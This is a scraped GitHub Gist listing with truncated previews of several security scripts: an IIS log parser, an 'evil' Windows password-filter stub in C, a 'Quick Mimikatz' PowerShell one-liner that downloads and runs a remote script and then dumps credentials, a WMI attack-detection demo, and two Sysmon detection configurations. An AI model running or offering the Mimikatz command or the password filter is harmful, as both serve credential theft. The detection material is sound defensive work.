Skip to content

Instantly share code, notes, and snippets.



View GitHub Profile
jstangroome / ConvertFrom-IISW3CLog.ps1
Created Aug 8, 2013
Function to convert lines in an IIS W3C log file to PowerShell objects
View ConvertFrom-IISW3CLog.ps1
function ConvertFrom-IISW3CLog {
param (
[Parameter(Mandatory, ValueFromPipeline, ValueFromPipelineByPropertyName)]
process {
mubix / evilpassfilter.cpp
Created Sep 10, 2013
Evil "Password Filter"
View evilpassfilter.cpp
#include <windows.h>
#include <stdio.h>
#include <WinInet.h>
#include <ntsecapi.h>
void writeToLog(const char* szString)
FILE* pFile = fopen("c:\\windows\\temp\\logFile.txt", "a+");
if (NULL == pFile)
gfoss / Quick-Mimikatz
Last active Feb 18, 2021
Quick Mimikatz
View Quick-Mimikatz
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*
#mimikatz [local]
IEX (New-Object Net.WebClient).DownloadString(""); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;
#encoded-mimikatz [local]
mattifestation / WMI_attack_detection.ps1
Last active Jan 25, 2021
BlueHat 2016 - WMI attack detection demo
View WMI_attack_detection.ps1
#region Scriptblocks that will execute upon alert trigger
$LateralMovementDetected = {
$Event = $EventArgs.NewEvent
$EventTime = [DateTime]::FromFileTime($Event.TIME_CREATED)
$MethodName = $Event.MethodName
$Namespace = $Event.Namespace
$Object = $Event.ObjectPath
$User = $Event.User
Neo23x0 / config-client.xml
Last active Oct 22, 2019
Sysmon Base Configuration - Workstations
View config-client.xml
This is a Microsoft Sysmon configuration to be used on Windows workstations
v0.2.1 December 2016
Florian Roth (with the help and ideas of others)
The focus of this configuration is
- malware detection (execution)
- malware detection (network connections)
- exploit detection
It is not focussed on
Neo23x0 / config-server.xml
Last active Nov 7, 2019
Sysmon Base Configuration - Windows Server
View config-server.xml
This is a Microsoft Sysmon configuation to be used on Windows server systems
v0.2.1 December 2016
Florian Roth
The focus of this configuration is
- hacking activity on servers / lateral movement (bad admin, attacker)
It is not focussed on
- malware detection (execution)
- malware detection (network connections)